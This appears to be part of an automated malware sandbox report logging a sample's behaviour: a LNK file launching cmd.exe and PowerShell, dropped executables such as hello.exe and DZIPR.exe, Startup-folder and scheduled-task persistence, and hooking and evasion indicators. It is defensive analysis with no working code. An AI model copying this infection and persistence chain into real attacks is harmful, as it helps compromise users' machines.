                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                      Source: MdkbG2pK4l.lnkLNK file: ..\Windows\System32\cmd.exe
                      Source: wanynpfhxudgrp.14.drLNK file: ..\..\..\..\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: BITE1BA.tmp.18.drLNK file: ..\..\..\..\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: msacm32.pdbUGP source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
                      Source: Binary string: msacm32.pdb source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
                      Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: hello.exe, 0000000B.00000003.1378606402.0000000002751000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmp, DZIPR.exe, 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000017.00000002.1825706075.0000000070128000.00000002.00000001.01000000.00000009.sdmp, DZIPR.dll.11.dr
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,11_2_00406D5D
                      Source: DZIPR.dll.11.drStatic PE information: real checksum: 0x601f9 should be: 0x5ee7e
                      Source: DZIPR.dll.12.drStatic PE information: real checksum: 0x601f9 should be: 0x5ee7e
                      Source: lejp.20.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: rjhlrgwt.28.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: hello.exe.3.drStatic PE information: real checksum: 0x33302 should be: 0x4a3c93
                      Source: paogviura.14.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: gnqpmvvlbu.24.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: DZIPR.exe.11.drStatic PE information: section name: .didata
                      Source: DZIPR.exe.12.drStatic PE information: section name: .didata
                      Source: paogviura.14.drStatic PE information: section name: cmxvoc
                      Source: lejp.20.drStatic PE information: section name: cmxvoc
                      Source: gnqpmvvlbu.24.drStatic PE information: section name: cmxvoc
                      Source: rjhlrgwt.28.drStatic PE information: section name: cmxvoc
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00411C20 push eax; ret 11_2_00411C4E
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE35401 push ecx; ret 12_2_6FE35414
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE351A1 push ecx; ret 12_2_6FE351B4
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C925401 push ecx; ret 13_2_6C925414
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C9251A1 push ecx; ret 13_2_6C9251B4
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB5401 push ecx; ret 19_2_6FEB5414
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB51A1 push ecx; ret 19_2_6FEB51B4

                      Persistence and Installation Behavior

                      barindex
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\paogviuraJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\hello.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\gnqpmvvlbuJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\lejpJump to dropped file
                      Source: C:\Users\user\DZIPR.exeFile created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\hello.exeJump to dropped file
                      Source: C:\Users\user\DZIPR.exeFile created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\hello.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\rjhlrgwtJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\hello.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\hello.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\paogviuraJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\lejpJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\gnqpmvvlbuJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\rjhlrgwtJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Roaming\hello.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\hello.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\lnfast_x64.jobJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmpJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PAOGVIURA
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\LEJP
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GNQPMVVLBU
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RJHLRGWT
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE2DE29 IsIconic,GetWindowPlacement,GetWindowRect,12_2_6FE2DE29
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C91DE29 IsIconic,GetWindowPlacement,GetWindowRect,13_2_6C91DE29
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEADE29 IsIconic,GetWindowPlacement,GetWindowRect,19_2_6FEADE29
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\DZIPR.exeAPI/Special instruction interceptor: Address: 6C9B7C44
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI/Special instruction interceptor: Address: 6C9B7C44
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI/Special instruction interceptor: Address: 6C9B7945
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C9B3B54
                      Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: F3A317
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4968Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4876Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\paogviuraJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gnqpmvvlbuJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lejpJump to dropped file
